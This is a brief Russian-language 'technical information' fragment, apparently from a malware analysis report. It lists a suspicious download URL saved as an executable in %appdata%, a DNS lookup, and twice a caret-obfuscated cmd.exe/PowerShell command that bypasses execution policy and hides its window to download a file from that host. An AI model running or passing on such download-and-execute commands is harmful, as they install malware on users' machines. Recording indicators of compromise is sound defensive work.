Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oW^eRs^h^El^l.EXE^ -eXecutI^on^P^ol^ic^Y ^BY^pAS^s -N^o^pRoFIL^e^ -WI^nDOWSTY^lE hiD^deN (n^Ew^-oBjecT^ SY^STem.n^e^t.WEB^cL^iENT^).doWn^L^O^AD^fILE^(^'http://transporingsytw.wa...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "P^oW^eRs^h^El^l.EXE^ -eXecutI^on^P^ol^ic^Y ^BY^pAS^s -N^o^pRoFIL^e^ -WI^nDOWSTY^lE hiD^deN (n^Ew^-oBjecT^ SY^STem.n^e^t.WEB^cL^iENT^).doWn^L^O^AD^fILE^(^'http://transporingsytw.wa...' (со скрытым окном)